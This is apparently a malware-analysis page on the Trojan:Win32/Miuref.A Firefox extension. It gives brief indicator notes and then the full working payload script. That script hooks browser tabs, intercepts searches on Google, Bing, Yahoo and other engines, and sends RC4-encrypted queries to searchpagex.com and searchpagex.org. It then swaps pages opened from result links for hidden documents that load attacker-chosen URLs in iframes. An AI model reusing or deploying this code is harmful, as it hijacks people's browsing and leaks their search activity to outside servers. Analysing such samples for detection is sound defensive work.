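- # Analysis of Trojan:Win32/Miuref.A
- # http://stopmalvertising.com/malware-reports/analysis-of-trojan-win32-miuref-a.html
- # Reading note: the blob below is a JSON object whose "c" field carries the script as an escaped string, so every \" and \n is a JSON escape rather than script text. The script uses Mozilla XPCOM interfaces (Components.classes, nsIObserverService, gBrowser).
- # Indicators visible in the sample: requests to searchpagex.com and searchpagex.org of the form /s?q= followed by a base64 string (function c; the payload is RC4-encrypted by function D), and the three hosts in the trailing "u" list. Table w lists the search-engine hosts and query parameters the script matches. Pages opened from a matching results page appear to be replaced with a hidden-body "Connecting..." document that loads a server-supplied URL in an iframe.
- MicrosoftDirectInputObject.js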
- "
- {
- "e": 0, "c": "(function()
- {
- function Q(a,c)
- {
- try
- {
- var b=y[z+\"xmlextras/xmlhttprequest;
- 1\"].createInstance(k.nsIXMLHttpRequest);
- b.timeout=6E4;
- b.open(\"GET\",a,!0);
- b.overrideMimeType(\"text/plain;
- charset=x-user-defined\");
- b.onreadystatechange=function()
- {
- try
- {
- 4==b.readyState&&c(b.responseText,b.status,b)
- }
- catch(a)
- {
- }
- }
- ;b.send(null)
- }
- catch(d)
- {
- }
- }
- function D(a,c)
- {
- var b=[],d,e,f,g;
- for(d=0;
- 256>d;
- d++)b[d]=d;
- for(d=e=0;
- 256>d;
- d++)e=(e+b[d]+c.charCodeAt(d%c.length))%256,f=b[d],b[d]=b[e],b[e]=f;
- d=e=0;
- var q=\"\";
- for(g=0;
- g<a.length;
- g++)d=(d+\n1)%256,e=(e+b[d])%256,f=b[d],b[d]=b[e],b[e]=f,q+=String.fromCharCode(a.charCodeAt(g)^b[(b[d]+b[e])%256]);
- return q
- }
- function r()
- {
- this.c=[]
- }
- function x(a)
- {
- try
- {
- return a.QueryInterface(k.nsIInterfaceRequestor).getInterface(k.nsIWebNavigation).QueryInterface(k.nsIDocShellTreeItem).rootTreeItem.QueryInterface(k.nsIInterfaceRequestor).getInterface(k.nsIDOMWindow)
- }
- catch(c)
- {
- }
- }
- function E()
- {
- return y[z+\"observer-service;
- 1\"].getService(k.nsIObserverService)
- }
- function F(a)
- {
- try
- {
- var c=x(a.target.ownerDocument.defaultView.top).gBrowser,\nb=c.getBrowserForTab(a.target),d=c.selectedBrowser.contentDocument,e=c.getBrowserForDocument(d);
- b.b=d.location.href;
- b.a=e.a;
- e.a=\"\"
- }
- catch(f)
- {
- }
- }
- function G(a)
- {
- try
- {
- for(var c=a.target;
- c&&(\"A\"!=c.nodeName||!c.href);
- )c=c.parentNode;
- if(c)
- {
- var b=c.ownerDocument,d=this.getBrowserForDocument(b);
- d.b=b.defaultView.location.href;
- d.a=c.href
- }
- }
- catch(e)
- {
- }
- }
- function R(a)
- {
- try
- {
- var c=this.gBrowser;
- if(c)
- {
- var b=a.originalTarget.ownerDocument,d=c.getBrowserForDocument(b);
- d.b=b.location.href;
- d.a=b.location.href
- }
- }
- catch(e)
- {
- }
- }
- \nfunction H(a)
- {
- a.addEventListener(I,J,!1);
- var c=a.gBrowser;
- c.tabContainer.addEventListener(\"TabOpen\",F,!1);
- c.addEventListener(K,G,!0);
- a.addEventListener(\"submit\",R,!0)
- }
- function L(a)
- {
- try
- {
- a.removeEventListener(I,J,!1)
- }
- catch(c)
- {
- }
- a=a.gBrowser;
- a.tabContainer.removeEventListener(\"TabOpen\",F,!1);
- a.removeEventListener(K,G,!0)
- }
- function J(a)
- {
- try
- {
- L(a.originalTarget.defaultView)
- }
- catch(c)
- {
- }
- }
- function C(a)
- {
- try
- {
- var c=a.originalTarget.defaultView;
- c.removeEventListener(\"load\",C,!1);
- if(c.opener)
- {
- var b=c.opener.gBrowser,\nd=b.contentDocument,e=d.location.href,f=b.getBrowserForDocument(d),g=c.gBrowser;
- if(!g)return;
- var q=g.selectedBrowser;
- q.b=e;
- q.a=f.a;
- f.a=\"\"
- }
- H(c)
- }
- catch(k)
- {
- }
- }
- function M(a)
- {
- var c=y[z+\"embedcomp/window-watcher;
- 1\"].getService(k.nsIWindowWatcher);
- try
- {
- for(var b=c.getWindowEnumerator();
- b.hasMoreElements();
- )
- {
- var d=b.getNext().QueryInterface(k.nsIDOMWindow);
- try
- {
- a(d,\"complete\"==d.document.readyState)
- }
- catch(e)
- {
- }
- }
- }
- catch(f)
- {
- }
- }
- function S()
- {
- M(function(a,c)
- {
- c&&(a.gBrowser?H(a):a.addEventListener(\"load\",C,!1))
- }
- )
- }
- function T()
- {
- M(function(a,\nc)
- {
- c&&(a.gBrowser?L(a):a.removeEventListener(\"load\",C,!1))
- }
- )
- }
- function A()
- {
- }
- var y=Components.classes,k=Components.interfaces,K=\"click\",I=\"unload\",z=\"@mozilla.org/\";
- r.prototype=
- {
- addListener:function(a)
- {
- this.j(a)||this.c.push(a)
- }
- ,removeListener:function(a)
- {
- a=this.g(a);
- 0<=a&&this.c.splice(a,1)
- }
- ,g:function(a)
- {
- for(var c=this.c,b=0;
- b<c.length;
- ++b)if(c[b]==a)return b;
- return-1
- }
- ,j:function(a)
- {
- return-1!=this.g(a)
- }
- ,o:function()
- {
- return 0<this.c.length
- }
- ,d:function()
- {
- try
- {
- for(var a=this.c,c=[],b=0;
- b<a.length;
- ++b)
- {
- var d=\na[b];
- if(\"function\"==typeof d)try
- {
- var e=d.apply(this,arguments);
- \"undefined\"!=typeof e&&c.push(e)
- }
- catch(f)
- {
- }
- }
- return c
- }
- catch(g)
- {
- }
- }
- }
- ;var N=new r,U=new r,O=new r,P=new r;
- (function()
- {
- function a(a)
- {
- window.l||(window.l=1,stop(),window.setTimeout(function()
- {
- var m=document.createElement(\"iframe\");
- m.src=a;
- if(document.body)document.body.appendChild(m);
- else
- {
- var b=document.createElement(\"body\");
- b.style.display=\"none\";
- var c=document.childNodes[0];
- c.appendChild(b);
- c.childNodes[0].appendChild(m)
- }
- }
- ,0))
- }
- function c(a,\nm)
- {
- var b=JSON.stringify(
- {
- q:a,p:m,t:u
- }
- );
- return p[s]+btoa(D(b,\"http\"))
- }
- function b(a)
- {
- if(a=v(a))
- {
- var m=a[2],b=a[1];
- n[b]||(n[b]=
- {
- h:Math.floor((new Date).getTime()/1E3),f:
- {
- }
- ,i:
- {
- }
- }
- ,Q(c(b,m),function(a,m)
- {
- if(200==m)
- {
- var B=D(atob(a),u);
- n[b].f=JSON.parse(B)
- }
- else s+=1,s>=p.length&&(s=0)
- }
- ));
- return b
- }
- }
- function d(b,m,c)
- {
- if(m&&(c=v(c))&&!(c[0]>=w.length))
- {
- m=c[1];
- c=w[c[0]][1];
- var d=b;
- c&&(d=c(b));
- if(d&&x.exec(d))try
- {
- var e=Math.floor((new Date).getTime()/1E3),f;
- for(f in n)try
- {
- n[f].h&&n[f].h+6E5<e&&delete n[f]
- }
- catch(h)
- {
- }
- if(n[m])
- {
- var k,\ng=n[m];
- if(g.f&&!g.i[b]&&(g.i[b]=1,k=g.f.u.shift()))return\"(\"+a.toString()+\")('\"+k+\"')\"
- }
- }
- catch(p)
- {
- }
- }
- }
- function e(a)
- {
- var b,c=
- {
- }
- ,d=a.split(\"&\");
- for(b in d)a=d[b].split(\"=\"),c[a[0]]=a[1];
- return c
- }
- function f(a)
- {
- if(a)
- {
- for(var b=h.exec(a),c=0;
- c<t.length;
- ++c)if(-1!=b[1].toLowerCase().indexOf(\".\"+t[c]+\".\"))return;
- return a
- }
- }
- function g(a)
- {
- try
- {
- var b=h.exec(a);
- if(-1==b[1].toLowerCase().indexOf(\".ask.\"))return f(a);
- if(\"/r\"==b[2]&&b[3])
- {
- var c=e(b[3]),d=unescape(c.zu?c.zu:c.u);
- return g(\"/\"==d.charAt(0)?b[0]+d:d)
- }
- }
- catch(k)
- {
- }
- }
- \nfunction q(a)
- {
- try
- {
- var b=h.exec(a);
- if(-1==b[1].toLowerCase().indexOf(\".google.\"))return f(a);
- if(\"/aclk\"==b[2])return a;
- if(\"/url\"==b[2]&&b[3])
- {
- var c=e(b[3]),d=c.url,d=unescape(d?d:c.q);
- return q(\"/\"==d.charAt(0)?b[0]+d:d)
- }
- }
- catch(g)
- {
- }
- }
- function k(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".aol.com\"))return f(a)
- }
- catch(c)
- {
- }
- }
- function r(a,b)
- {
- for(var c=0;
- c<a.length;
- ++c)if(b(a[c]))return!0;
- return!1
- }
- function v(a)
- {
- if(a=h.exec(a))for(var b=a[1].toLowerCase(),c=a[2].toLowerCase(),d=0;
- d<w.length;
- ++d)
- {
- var f=\nw[d];
- if(-1!=b.indexOf(f[2]))
- {
- if(r(f[3],function(a)
- {
- return a==c
- }
- )||r(f[4],function(a)
- {
- return 0<=c.indexOf(a)
- }
- ))if(b=
- {
- }
- ,f[6]&&a[4]?b=e(a[4]):a[3]&&(b=e(a[3])),f[5]in b)return[d,escape(unescape(b[f[5]].replace(/\\+/g,\" \"))),f[0]];
- break
- }
- }
- }
- var n=
- {
- }
- ,u=\"\";
- N.addListener(function(a)
- {
- u=a;
- O.addListener(b);
- P.addListener(d)
- }
- );
- var p=[\"http://searchpagex.com/s?q=\",\"http://searchpagex.org/s?q=\"],s=Math.floor(Math.random()*p.length),h=/^https?:\\/\\/(.*?)(\\/[^\\?#]*)(?:\\?([^#]*))?(?:#(.*))?/i,x=/^https?\\:\\/\\//i,t=\"google facebook youtube yahoo amazon wikipedia ebay gmail twitter craigslist linkedin live go pinterest bing tumblr paypal aol cnn netflix weather apple imgur imdb zedo nytimes microsoft walmart yelp wellsfargo comcast foxnews hulu myspace reddit pandora reference\".split(\" \"),\nw=[[0,q,\".google.\",[\"/webhp\",\"/gen_204\",\"/search\",\"/\"],[],\"q\",!0],[1,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".bing.\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\".bing.\",[\"/search\"],[],\"q\",!1],[2,function(a)
- {
- try
- {
- var b;
- if(b=h.exec(a))
- {
- var c=b[1].toLowerCase(),d=b[2].toLowerCase();
- if(-1!=c.indexOf(\".yahoo.\"))
- {
- if(0!=d.indexOf(\"/r/\"))return;
- a=unescape(a.substr(a.indexOf(\"**http\")+2))
- }
- return f(a)
- }
- }
- catch(e)
- {
- }
- }
- ,\".yahoo.\",[],[\"/search\"],\"p\",!1],[3,k,\".aol.com\",[],[\"/search\"],\"q\",!1],[3,k,\".aol.ca\",\n[],[\"/search\"],\"q\",!1],[4,g,\".ask.com\",[\"/web\"],[],\"q\",!1],[6,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\"avg.com\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\"search.avg.com\",[\"/search\"],[],\"q\",!0],[9,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".mywebsearch.com\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\".mywebsearch.com\",[],[\"ggmain.jhtml\",\"ggweb.jhtml\"],\"searchfor\",!1],[15,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\".search-results.com\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\n\".search-results.com\",[\"/web\"],[],\"q\",!1],[18,function(a)
- {
- try
- {
- var b;
- if((b=h.exec(a))&&-1==b[1].toLowerCase().indexOf(\"comcast.net\"))return f(a)
- }
- catch(c)
- {
- }
- }
- ,\"search.comcast.net\",[\"/\"],[],\"q\",!1],[23,null,\".delta-search.com\",[\"/\"],[],\"q\",!1]]
- }
- )();
- A.prototype=
- {
- m:function()
- {
- var a=E();
- a.addObserver(this,\"toplevel-window-ready\",!1);
- a.addObserver(this,\"http-on-examine-response\",!1);
- a.addObserver(this,\"content-document-global-created\",!1);
- S()
- }
- ,n:function()
- {
- var a=E();
- a.removeObserver(this,\"toplevel-window-ready\");
- \na.removeObserver(this,\"http-on-examine-response\");
- a.removeObserver(this,\"content-document-global-created\");
- T()
- }
- }
- ;A.prototype.observe=function(a,c,b)
- {
- switch(c)
- {
- case \"toplevel-window-ready\":a.addEventListener(\"load\",C,!1);
- break;
- case \"http-on-examine-response\":try
- {
- if(a)
- {
- var d=a.QueryInterface(k.nsIHttpChannel),e=x(d.notificationCallbacks);
- !e&&d.loadGroup&&(e=x(d.loadGroup.notificationCallbacks));
- if(e)
- {
- var f=e.content.document,g=e.gBrowser;
- if(g)
- {
- var q=g.getBrowserForDocument(f);
- if(q.e)
- {
- var r=d.responseStatus;
- \nif(\"4\"==r[0]||\"5\"==r[0])q.e=0,f.location=q.k
- }
- else O.d(d.name)
- }
- }
- }
- }
- catch(t)
- {
- }
- break;
- case \"content-document-global-created\":if(b&&\"null\"!=b)try
- {
- var v=a.top;
- if(a==v)
- {
- var n=v.document,u=x(v).gBrowser;
- u||(u=x(v).wrappedJSObject.gBrowser);
- if(u)
- {
- var p=u.getBrowserForDocument(n);
- if(p)
- {
- var s=a.document.referrer,h=v.location.href;
- \"about:blank\"==h&&(h=\"\");
- var y=p.b,z=p.a;
- h&&(p.a=\"\");
- p.e=0;
- s||z||(p.b=\"\");
- s?p.a=\"\":s=z;
- if(h&&s&&y)
- {
- p.b=\"\";
- var w=P.d(h,s,y);
- if(w&&w.length)
- {
- p.e=1;
- p.k=h;
- var n=a.document,B=n.documentElement,\nm=B?B:n.createElement(\"html\");
- m.innerHTML='<html><head><title>Connecting...</title></head><body style=\"display:none\"></body></html>';
- B||n.appendChild(m);
- n.getElementsByTagName(\"head\");
- var A=n.createElement(\"script\");
- A.innerHTML=\"(function()
- {
- try
- {
- \"+w.join(\"
- }
- catch(e)
- {
- }
- ;try
- {
- \")+\"
- }
- catch(e)
- {
- }
- }
- ())\";
- m.appendChild(A)
- }
- }
- }
- }
- }
- }
- catch(D)
- {
- }
- }
- }
- ;var t;
- return[function(a)
- {
- N.d(a);
- t=new A;
- t.m()
- }
- ,function()
- {
- t&&(t.n(),t=null);
- U.d()
- }
- ]
- }
- )();
- \n", "u": ["http://search-page.net", "http://search-direct.net", "http://searchtop.org"], "v": 4
- }
- "